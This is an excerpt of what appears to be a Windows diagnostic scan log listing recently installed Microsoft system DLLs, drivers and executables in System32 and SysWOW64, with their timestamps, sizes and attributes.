2016-12-20 23:35 - 2016-09-12 13:08 - 01226752 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-12-20 23:35 - 2016-09-09 07:54 - 01629184 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-12-20 23:35 - 2016-09-09 07:54 - 00586752 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-12-20 23:35 - 2016-09-09 07:54 - 00575488 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-12-20 23:35 - 2016-09-09 07:54 - 00314368 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-12-20 23:35 - 2016-09-09 07:54 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2016-12-20 23:35 - 2016-09-09 07:54 - 00224256 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-12-20 23:35 - 2016-09-09 07:54 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-12-20 23:30 - 2016-11-21 10:16 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-12-20 23:30 - 2016-11-21 10:16 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-12-20 23:30 - 2016-11-21 10:12 - 01462272 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00109568 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-12-20 23:30 - 2016-11-20 08:20 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-12-20 23:30 - 2016-11-20 08:20 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-12-20 23:30 - 2016-11-20 08:20 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-12-20 23:30 - 2016-11-20 08:20 - 00082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2016-12-20 23:30 - 2016-11-20 08:20 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00084992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hlink.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-12-20 23:30 - 2016-11-20 08:04 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-12-20 23:30 - 2016-11-20 07:58 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-12-20 23:30 - 2016-11-20 07:57 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-12-20 23:30 - 2016-11-20 07:57 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-12-20 23:30 - 2016-11-20 07:57 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-12-20 23:30 - 2016-11-20 07:57 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-12-20 23:30 - 2016-11-20 07:52 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-12-20 23:30 - 2016-11-20 06:07 - 00467392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2016-12-20 23:30 - 2016-11-17 08:41 - 00370920 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys
2016-12-20 23:30 - 2016-11-14 15:27 - 00394448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-12-20 23:30 - 2016-11-14 14:39 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-12-20 23:30 - 2016-11-12 11:48 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-12-20 23:30 - 2016-11-12 11:48 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-12-20 23:30 - 2016-11-12 11:28 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-12-20 23:30 - 2016-11-12 11:26 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-12-20 23:30 - 2016-11-12 11:26 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-12-20 23:30 - 2016-11-12 11:25 - 00576000 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-12-20 23:30 - 2016-11-12 11:25 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-12-20 23:30 - 2016-11-12 11:21 - 02896384 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-12-20 23:30 - 2016-11-12 11:15 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-12-20 23:30 - 2016-11-12 11:14 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-12-20 23:30 - 2016-11-12 11:09 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-12-20 23:30 - 2016-11-12 11:08 - 25759744 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-12-20 23:30 - 2016-11-12 11:08 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-12-20 23:30 - 2016-11-12 11:08 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-12-20 23:30 - 2016-11-12 11:07 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-12-20 23:30 - 2016-11-12 11:07 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-12-20 23:30 - 2016-11-12 10:56 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2016-12-20 23:30 - 2016-11-12 10:53 - 06049280 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-12-20 23:30 - 2016-11-12 10:52 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-12-20 23:30 - 2016-11-12 10:47 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-12-20 23:30 - 2016-11-12 10:41 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-12-20 23:30 - 2016-11-12 10:40 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2016-12-20 23:30 - 2016-11-12 10:35 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-12-20 23:30 - 2016-11-12 10:34 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-12-20 23:30 - 2016-11-12 10:31 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-12-20 23:30 - 2016-11-12 10:30 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2016-12-20 23:30 - 2016-11-12 10:29 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-12-20 23:30 - 2016-11-12 10:29 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-12-20 23:30 - 2016-11-12 10:29 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2016-12-20 23:30 - 2016-11-12 10:28 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2016-12-20 23:30 - 2016-11-12 10:27 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-12-20 23:30 - 2016-11-12 10:20 - 02287616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-12-20 23:30 - 2016-11-12 10:20 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-12-20 23:30 - 2016-11-12 10:19 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2016-12-20 23:30 - 2016-11-12 10:17 - 20302848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-12-20 23:30 - 2016-11-12 10:15 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-12-20 23:30 - 2016-11-12 10:14 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-12-20 23:30 - 2016-11-12 10:14 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-12-20 23:30 - 2016-11-12 10:14 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-12-20 23:30 - 2016-11-12 10:14 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-12-20 23:30 - 2016-11-12 10:11 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-12-20 23:30 - 2016-11-12 10:10 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-12-20 23:30 - 2016-11-12 10:08 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-12-20 23:30 - 2016-11-12 10:08 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-12-20 23:30 - 2016-11-12 10:03 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-12-20 23:30 - 2016-11-12 09:57 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2016-12-20 23:30 - 2016-11-12 09:56 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2016-12-20 23:30 - 2016-11-12 09:52 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-12-20 23:30 - 2016-11-12 09:51 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-12-20 23:30 - 2016-11-12 09:49 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-12-20 23:30 - 2016-11-12 09:47 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2016-12-20 23:30 - 2016-11-12 09:41 - 15257088 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-12-20 23:30 - 2016-11-12 09:40 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-12-20 23:30 - 2016-11-12 09:38 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-12-20 23:30 - 2016-11-12 09:37 - 04608000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-12-20 23:30 - 2016-11-12 09:36 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-12-20 23:30 - 2016-11-12 09:36 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2016-12-20 23:30 - 2016-11-12 09:35 - 02920960 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-12-20 23:30 - 2016-11-12 09:21 - 13653504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-12-20 23:30 - 2016-11-12 09:20 - 01543680 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-12-20 23:30 - 2016-11-12 09:11 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-12-20 23:30 - 2016-11-12 09:05 - 02444800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-12-20 23:30 - 2016-11-12 09:02 - 01312256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-12-20 23:30 - 2016-11-12 09:02 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-12-20 23:30 - 2016-11-10 08:32 - 01009152 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2016-12-20 23:30 - 2016-11-10 08:19 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2016-12-20 23:30 - 2016-11-09 08:41 - 00114408 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2016-12-20 23:30 - 2016-11-09 08:33 - 03244032 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2016-12-20 23:30 - 2016-11-09 08:33 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-12-20 23:30 - 2016-11-09 08:33 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2016-12-20 23:30 - 2016-11-09 08:33 - 00070144 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2016-12-20 23:30 - 2016-11-09 08:33 - 00025088 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2016-12-20 23:30 - 2016-11-09 08:33 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-12-20 23:30 - 2016-11-09 08:17 - 02365440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2016-12-20 23:30 - 2016-11-09 08:17 - 01806848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2016-12-20 23:30 - 2016-11-09 08:17 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2016-12-20 23:30 - 2016-11-09 08:17 - 00025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2016-12-20 23:30 - 2016-11-09 08:17 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2016-12-20 23:30 - 2016-11-09 08:02 - 00128512 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2016-12-20 23:30 - 2016-11-09 07:55 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2016-12-20 23:30 - 2016-11-06 08:33 - 00404992 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2016-12-20 23:30 - 2016-11-06 08:16 - 00312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2016-12-20 23:30 - 2016-11-06 08:01 - 03219456 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-12-20 23:30 - 2016-10-27 07:33 - 00802304 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2016-12-20 23:30 - 2016-10-27 07:20 - 00627712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2016-12-20 23:30 - 2016-10-11 07:40 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-12-20 23:30 - 2016-10-11 07:37 - 05547752 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-12-20 23:30 - 2016-10-11 07:37 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-12-20 23:30 - 2016-10-11 07:34 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00069120 _____ (Microsoft Corporation) C:\Windows\system32\nlsbres.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:24 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-12-20 23:30 - 2016-10-11 07:24 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-12-20 23:30 - 2016-10-11 07:21 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlsbres.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
